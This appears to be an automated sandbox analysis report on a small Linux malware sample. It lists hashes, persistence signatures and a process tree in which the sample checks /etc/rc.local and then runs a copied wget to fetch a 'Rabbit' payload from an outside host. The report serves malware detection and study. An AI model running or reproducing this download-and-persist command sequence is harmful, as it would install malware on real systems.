Overview

overview

7

Static

static

1

be0ba29064...04 (1)

ubuntu-18.04-amd64

7

be0ba29064...04 (1)

debian-9-armhf

7

be0ba29064...04 (1)

debian-9-mips

7

be0ba29064...04 (1)

debian-9-mipsel

7

Analysis

  • max time kernel
    133s
  • max time network
    150s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    07-08-2024 07:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204 (1)

  • Size

    2KB

  • MD5

    0ea832c7d725eda26ceb3edafd003a8a

  • SHA1

    8f2395dd84712798300b938822da816d805e5256

  • SHA256

    be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204

  • SHA512

    8255058ffb6c2ea4ec4f9643020cbd8231313c13ba3ddf07d11c3b742704a296e5245cbc94ba848f48cf4ea87778be72f2ff3b494a0c02a5187797d22e935578

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

    persistence
  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204 (1)
    "/tmp/be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204 (1)"
    1⤵
    • Modifies rc script
    PID:701
    • /bin/grep
      grep -v grep
      2⤵
        PID:707
      • /bin/cat
        cat /etc/rc.local
        2⤵
          PID:705
        • /bin/grep
          grep /etc/chongfu.sh
          2⤵
            PID:706
          • /bin/ps
            ps aux
            2⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:714
          • /bin/grep
            grep /tmp/Rabbit
            2⤵
              PID:715
            • /bin/grep
              grep -v grep
              2⤵
                PID:716
              • /usr/bin/wc
                wc -l
                2⤵
                  PID:717
                • /bin/cp
                  cp /usr/bin/wget .
                  2⤵
                  • Writes file to tmp directory
                  PID:722
                • /bin/chmod
                  chmod +x wget
                  2⤵
                    PID:724
                  • /tmp/wget
                    ./wget -P /tmp/ http://www.t-rabbit.click:10241/Rabbit
                    2⤵
                    • Executes dropped EXE
                    PID:726

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /etc/rc.local
                  Filesize

                  21B

                  MD5

                  210e7e809dc51ae3b7ca88ad41c9cee5

                  SHA1

                  6213f44d196ecb0409da0e94d5fcf1642d59a693

                  SHA256

                  d11b3adb85e5c40d042e06871f3bd1316805538247de1b8e46b5e21ddace516b

                  SHA512

                  e0e8e4ade4de676bee84d458fa2d63944e7b6b6af91c2ccb0411ae72a1b581434a2165927c9428197ee2ddf70229ac688c52df491738d0f135d54cf2482750bf

                  Download Submit

                • /tmp/wget
                  Filesize

                  536KB

                  MD5

                  4a7c9f69532775b790e8d999f73a68b9

                  SHA1

                  9cf4d3d57284103e828dcaa514bfa76e84366472

                  SHA256

                  ba3dee31b794d6e0e2df228a87f54f3432100a4acfee8f1a7a64d2584cd80495

                  SHA512

                  925d73442f8a824ac2c016d1ce12293b30ced91cc3954ef74dbd604fc7b4a6c60227c82c52e5491ec3ba8d20a2a8d3b3b6739ef64cc242b9335a756f6631b128

                  Download Submit